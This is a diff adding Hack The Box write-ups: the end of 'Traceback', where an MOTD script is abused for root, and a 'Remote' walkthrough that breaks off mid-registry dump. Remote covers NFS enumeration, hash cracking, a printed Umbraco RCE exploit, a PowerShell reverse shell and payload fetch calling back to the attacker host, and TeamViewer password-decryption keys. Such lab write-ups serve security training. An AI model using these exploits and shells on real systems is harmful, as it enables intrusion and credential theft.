+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ # GNU General Public License for more details.
+ #
+ # You should have received a copy of the GNU General Public License along
+ # with this program; if not, write to the Free Software Foundation, Inc.,
+ # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+ [ -r /etc/lsb-release ] && . /etc/lsb-release
+
+
+ echo "\nWelcome to Xh4H land \n"
+
+
+
+the **00-header** file in particular is responsible for what message appears when you SSH into the machine, and any code in that file will be run as the root account since the ssh-server service is ran by the root user. Since the file is **owned by the sysadmin user** and **ran by the root user** , the sysadmin user can run commands as the root user. such as allowing our public key to be used to login as the root user:
+
+
+ sysadmin@traceback:/etc/update-motd.d$ echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/" >> 00-header
+
+
+
+Now to run the command we added, we ssh as the sysadmin user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → ssh sysadmin@10.10.10.181 -i ~/.ssh/id_ed25519
+ #################################
+ -------- OWNED BY XH4H ---------
+ - I guess stuff could have been configured better ^^ -
+ #################################
+
+ Welcome to Xh4H land
+
+
+and before the 30 second cleanup happens, we login as the root user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/31 ] [~/HTB/Traceback]
+ → ssh root@10.10.10.181 -i ~/.ssh/id_ed25519
+ #################################
+ -------- OWNED BY XH4H ---------
+ - I guess stuff could have been configured better ^^ -
+ #################################
+
+ Welcome to Xh4H land
+
+
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+ Last login: Mon Apr 26 02:23:35 2021
+ root@traceback:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@traceback:~# cat root.txt
+ c4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
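Review bot: the ownership claim in "Since the file is **owned by the sysadmin user** and **ran by the root user**" does not match the listing shown just above it, where `91-release-upgrade` is `-rwxrwxr-x 1 root sysadmin`, i.e. owned by root and group-writable by the sysadmin group; if `00-header` carries the same mode, say "group-writable by sysadmin" rather than "owned by", since that is the misconfiguration being abused. The mechanism is also slightly off: the scripts in /etc/update-motd.d are executed as root by pam_motd (via run-parts) when a session opens, not by "the ssh-server service", so the appended command fires on any login that goes through pam_motd and keeps firing on every login until the cleanup removes it; worth stating, because the walkthrough relies on that timing window. Finally, `echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/" >> 00-header` silently overwrites root's existing authorized_keys if there is one; appending (`cat ... >> /root/.ssh/authorized_keys`) is the less destructive form and should be mentioned alongside the side effect.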
diff --git a/Easy/44.md b/Easy/44.md
new file mode 100644
index 0000000..ff96bf6
--- /dev/null
+++ b/Easy/44.md
@@ -0,0 +1,719 @@
+# Remote Writeup
+
+
+
+## Introduction :
+
+Remote is an easy Windows box released back in march 2020
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.180
+ Discovered open port 111/tcp on 10.10.10.180
+ Discovered open port 135/tcp on 10.10.10.180
+ Discovered open port 139/tcp on 10.10.10.180
+ Discovered open port 445/tcp on 10.10.10.180
+ Discovered open port 21/tcp on 10.10.10.180
+ Discovered open port 49666/tcp on 10.10.10.180
+ Discovered open port 49678/tcp on 10.10.10.180
+ Discovered open port 5985/tcp on 10.10.10.180
+ Discovered open port 47001/tcp on 10.10.10.180
+ Discovered open port 49667/tcp on 10.10.10.180
+ Discovered open port 49665/tcp on 10.10.10.180
+ Discovered open port 2049/tcp on 10.10.10.180
+ Discovered open port 49664/tcp on 10.10.10.180
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST
+ Nmap scan report for 10.10.10.180
+ Host is up (0.043s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-title: Home - Acme Widgets
+ 111/tcp open rpcbind 2-4 (RPC #100000)
+ | rpcinfo:
+ | program version port/proto service
+ | 100000 2,3,4 111/tcp rpcbind
+ | 100000 2,3,4 111/tcp6 rpcbind
+ | 100000 2,3,4 111/udp rpcbind
+ | 100000 2,3,4 111/udp6 rpcbind
+ | 100003 2,3 2049/udp nfs
+ | 100003 2,3 2049/udp6 nfs
+ | 100003 2,3,4 2049/tcp nfs
+ | 100003 2,3,4 2049/tcp6 nfs
+ | 100005 1,2,3 2049/tcp mountd
+ | 100005 1,2,3 2049/tcp6 mountd
+ | 100005 1,2,3 2049/udp mountd
+ | 100005 1,2,3 2049/udp6 mountd
+ | 100021 1,2,3,4 2049/tcp nlockmgr
+ | 100021 1,2,3,4 2049/tcp6 nlockmgr
+ | 100021 1,2,3,4 2049/udp nlockmgr
+ | 100021 1,2,3,4 2049/udp6 nlockmgr
+ | 100024 1 2049/tcp status
+ | 100024 1 2049/tcp6 status
+ | 100024 1 2049/udp status
+ |_ 100024 1 2049/udp6 status
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds?
+ 2049/tcp open mountd 1-3 (RPC #100005)
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 7m35s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-05-30T16:21:22
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 FTP with anonymous login allowed, We can recursively get what's there with wget :
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → wget -r ftp://anonymous:anonymous@10.10.10.180/
+
+
+
+However there are no files to get so we're going to continue exploring port 80 instead:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.180
+ [+] Method: GET
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/30 18:42:03 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /Blog (Status: 200) [Size: 5001]
+ /Contact (Status: 200) [Size: 7880]
+ /Home (Status: 200) [Size: 6703]
+ /People (Status: 200) [Size: 6749]
+ /Products (Status: 200) [Size: 5338]
+ /about-us (Status: 200) [Size: 5451]
+ /blog (Status: 200) [Size: 5011]
+ /contact (Status: 200) [Size: 7890]
+ /home (Status: 200) [Size: 6703]
+ /install (Status: 302) [Size: 126] [--> /umbraco/]
+ /intranet (Status: 200) [Size: 3323]
+ /master (Status: 500) [Size: 3420]
+ /people (Status: 200) [Size: 6739]
+ /person (Status: 200) [Size: 2741]
+ /product (Status: 500) [Size: 3420]
+ /products (Status: 200) [Size: 5328]
+ /render/https://www.google.com (Status: 400) [Size: 3420]
+ /umbraco (Status: 200) [Size: 4040]
+
+ ===============================================================
+ 2021/05/30 18:43:05 Finished
+ ===============================================================
+
+
+
+Here we see that gobuster picked up the /umbraco/ directory:
+
+
+
+Although we don't have credentials to get in yet. Our nmap scan picked up some available NFS shares on port 111, so let's enumerate those using the **showmount** utility:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → apt search showmount
+ Sorting... Done
+ Full Text Search... Done
+ nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic]
+ NFS support files common to client and server
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → sudo apt install nfs-common -y
+ [sudo] password for nothing:
+ Reading package lists... Done
+ Building dependency tree... Done
+ Reading state information... Done
+ nfs-common is already the newest version (1:1.3.4-5).
+ nfs-common set to manually installed.
+ 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → showmount -e 10.10.10.180
+ Export list for 10.10.10.180:
+ /site_backups (everyone)
+
+
+
+Here we see a mountable folder called site_backups, so let's mount it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → mkdir backups
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → sudo mount -t nfs 10.10.10.180:/site_backups backups/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → ls -lash backups
+ total 123K
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 23 2020 .
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K May 30 19:40 ..
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
+ 48K drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin
+ 8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
+ 512 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
+ 512 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
+ 8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views
+ 28K -rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config
+
+
+Now here in the files we see that there are some Umbraco directories, and after searching a bit online, we see that there can be a server database in the **/App_Data** folder named **Umbraco.sdf**
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → strings backups/App_Data/Umbraco.sdf| grep Administrator
+ Administratoradmindefaulten-US
+ Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
+ Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
+ adminAdministratorsCADMOSKTPIURZ:5F7
+
+
+Here we see that the Administrator user has a hashed password with the SHA1 algorithm, so let's attempt to crack it using john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cat hash.txt
+ b8be16afba8c314ad33d812f22a04991b90e2aaa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
+ Warning: no OpenMP support for this hash type, consider --fork=4
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ baconandcheese (?)
+ 1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918
+ Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And we found the Administrator password for Umbraco: **baconandcheese** , so let's login:
+
+
+
+Clicking help at the bottom left corner, we can see the version of this Umbraco instance:
+
+
+
+And so we can look for CVEs for that Umbraco version:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → searchsploit umbraco
+ ------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------- ---------------------------------
+ Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
+ **Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py**
+ Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py
+ Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt
+ ------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+And we get a few exploits to use for our Umbraco instance! Let's try the first RCE exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cp $(locate 46153.py) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cat 46153.py
+ # Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
+ # Dork: N/A
+ # Date: 2019-01-13
+ # Exploit Author: Gregory DRAPERI & Hugo BOUTINON
+ # Vendor Homepage: http://www.umbraco.com/
+ # Software Link: https://our.umbraco.com/download/releases
+ # Version: 7.12.4
+ # Category: Webapps
+ # Tested on: Windows IIS
+ # CVE: N/A
+
+
+ import requests;
+
+ from bs4 import BeautifulSoup;
+
+ def print_dict(dico):
+ print(dico.items());
+
+ print("Start");
+
+ # Execute a calc for the PoC
+ payload = '<****?xml version="1.0"?> <****xsl:stylesheet version="1.0" \
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
+ xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <****msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
+ { string**cmd = "wget 10.10.14.13/your_rce_attempt_worked!";** System.Diagnostics.Process proc = new System.Diagnostics.Process();\
+ proc.StartInfo.FileName = **"powershell.exe";** proc.StartInfo.Arguments = cmd;\
+ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
+ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
+ <****/msxsl:script> <****xsl:template match="/"> <****xsl:value-of select="csharp_user:xml()"/>\ <****/xsl:template> <****/xsl:stylesheet> ';**login = "admin@htb.local";
+ password="baconandcheese";
+ host = "http://10.10.10.180";**
+ # Step 1 - Get Main page
+ s = requests.session()
+ url_main =host+"/umbraco/";
+ r1 = s.get(url_main);
+ print_dict(r1.cookies);
+
+ # Step 2 - Process Login
+ url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
+ loginfo = {"username":login,"password":password};
+ r2 = s.post(url_login,json=loginfo);
+
+ # Step 3 - Go to vulnerable web page
+ url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
+ r3 = s.get(url_xslt);
+
+ soup = BeautifulSoup(r3.text, 'html.parser');
+ VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
+ VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
+ UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
+ headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
+ data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
+
+ # Step 4 - Launch the attack
+ r4 = s.post(url_xslt,data=data,headers=headers);
+
+ print("End");%
+
+
+
+Make sure you edit the values of login, password, host, powershell.exe and wget tun0/rcetest that i highlighted above, then proceed:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 46153.py
+ Start
+ []
+ End
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → sudo python3 -m http.server 80
+ [sudo] password for nothing:
+ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
+ 10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found
+ 10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 -
+
+
+And now after testing it we see that we have been able to get the machine to execute the wget command back to us, however [noraj](https://pwn.by/noraj/index.md) made a much better rewrite of this Umbraco RCE python exploit which allows us to pass arguements:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
+ --2021-05-31 07:07:53-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 3202 (3.1K) [text/plain]
+ Saving to: ‘exploit.py’
+
+ exploit.py 100%[======================================================================================================================================================>] 3.13K --.-KB/s in 0s
+
+ 2021-05-31 07:07:53 (6.52 MB/s) - ‘exploit.py’ saved [3202/3202]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -h
+ usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
+
+ Umbraco authenticated RCE
+
+ optional arguments:
+ -h, --help show this help message and exit
+ -u USER, --user USER username / email
+ -p PASS, --password PASS password
+ -i URL, --host URL root URL
+ -c CMD, --command CMD command
+ -a ARGS, --arguments ARGS arguments
+
+
+
+So let's use it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami'
+ iis apppool\defaultapppool
+
+
+
+We see that we can get remote code execution as the apppool user,
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo'
+
+ Host Name: REMOTE
+ OS Name: Microsoft Windows Server 2019 Standard
+ OS Version: 10.0.17763 N/A Build 17763
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00429-00521-62775-AA801
+ Original Install Date: 2/19/2020, 4:03:29 PM
+ System Boot Time: 5/30/2021, 12:07:27 PM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware7,1
+ System Type: x64-based PC
+ Processor(s): 4 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-05:00) Eastern Time (US & Canada)
+ Total Physical Memory: 4,095 MB
+ Available Physical Memory: 2,745 MB
+ Virtual Memory: Max Size: 4,799 MB
+ Virtual Memory: Available: 3,426 MB
+ Virtual Memory: In Use: 1,373 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ **Hotfix(s): 5 Hotfix(s) Installed.
+ [01]: KB4534119
+ [02]: KB4462930
+ [03]: KB4516115
+ [04]: KB4523204
+ [05]: KB4464455**
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: vmxnet3 Ethernet Adapter
+ Connection Name: Ethernet0 2
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.180
+ [02]: fe80::108b:625:aa40:7e42
+ [03]: dead:beef::108b:625:aa40:7e42
+ Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+
+
+And we also are able to print out the infos about the server itself, including the current hotfixes. However we first need to get a reverse shell onto the box, let's find where the ftp folder is:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/'
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ **d----- 2/20/2020 1:13 AM ftp_transfer**
+ d----- 2/19/2020 3:11 PM inetpub
+ d----- 2/19/2020 11:09 PM Microsoft
+ d----- 9/15/2018 3:19 AM PerfLogs
+ d-r--- 2/23/2020 2:19 PM Program Files
+ d----- 2/23/2020 2:19 PM Program Files (x86)
+ **d----- 5/30/2021 11:07 AM site_backups**
+ d-r--- 2/19/2020 3:12 PM Users
+ d----- 2/20/2020 12:52 AM Windows
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt'
+
+
+ Directory: C:\ftp_transfer
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/31/2021 1:45 AM 0 test.txt
+
+
+And as you can see, we are able to write to the **C:\ftp_transfer** directory so let's make use of it by first locally creating our powershell script containing our reverse shell payload:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → vim shell.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cat shell.ps1
+ $client = New-Object System.Net.Sockets.TCPClient(**"10.10.14.13",9001**);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+
+
+
+This will send a reverse shell connection back to our **tun0** interface on port **9001** once we get the box to execute it. In order to do that, we can get this script into the ftp_transfer directory we found earlier:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → ls -lash shell.ps1
+ 4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 -
+
+
+
+Now that our shell.ps1 got uploaded, let's execute it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854
+ whoami
+ iis apppool\defaultapppool
+
+
+And we got a reverse shell connection!
+
+
+ # cd c:\users\public
+ # ls
+
+
+ Directory: C:\users\public
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 2/19/2020 3:03 PM Documents
+ d-r--- 9/15/2018 3:19 AM Downloads
+ d-r--- 9/15/2018 3:19 AM Music
+ d-r--- 9/15/2018 3:19 AM Pictures
+ d-r--- 9/15/2018 3:19 AM Videos
+ -ar--- 5/30/2021 12:08 PM 34 user.txt
+
+
+ # cat user.txt
+ 67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we managed to get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the Administrator user on this box, we're going to run winpeas on the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
+ → cp $(locate winPEAS.ps1) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
+ → ls -lash Invoke-winPEAS.ps1
+ 228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ # cd C:\ftp_transfer
+ # curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1
+
+ # import-module ./peas.ps1
+ # Invoke-winPEAS
+
+
+
+So here we basically got our winpeas powershell module onto the box, then we imported it which gave us the Invoke-winPEAS command to execute:
+
+
+
+Immediately winPEAS found 9 potential CVEs on the box:
+
+
+
+However one of the intended privesc paths to follow was the TeamViewer v7 application that's installed on the box:
+
+
+
+
+ # cd 'C:\Program Files (x86)\TeamViewer\'
+ # ls
+
+
+ Directory: C:\Program Files (x86)\TeamViewer
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 5/31/2021 12:54 AM Version7
+
+
+
+We're going to take advantage of this teamviewer version 7 software to privesc to the Administrator user like how it was described in this [blogpost](https://whynotsecurity.com/blog/teamviewer/):
+
+First of all, TeamViewer7 stores the password in the registry under the value **SecurityPasswordAES** and this password is encrypted with **AES-128-CBC** , with the key set as **0602000000a400005253413100040000** and the Initialization Vector set as **0100010067244F436E6762F25EA8D704** , Looking up google a bit, we [find](https://community.teamviewer.com/English/kb/articles/16835-how-to-uninstall-teamviewer-on-pc) that the registry key for TeamViewer is under **HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer** :
+
+
+ # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
+ # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
+ StartMenuGroup REG_SZ TeamViewer 7
+ InstallationDate REG_SZ 2020-02-20
+ InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
+ Always_Online REG_DWORD 0x1
+ Security_ActivateDirectIn REG_DWORD 0x0
+ Version REG_SZ 7.0.43148
+ ClientIC REG_DWORD 0x11f25831
+ SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C5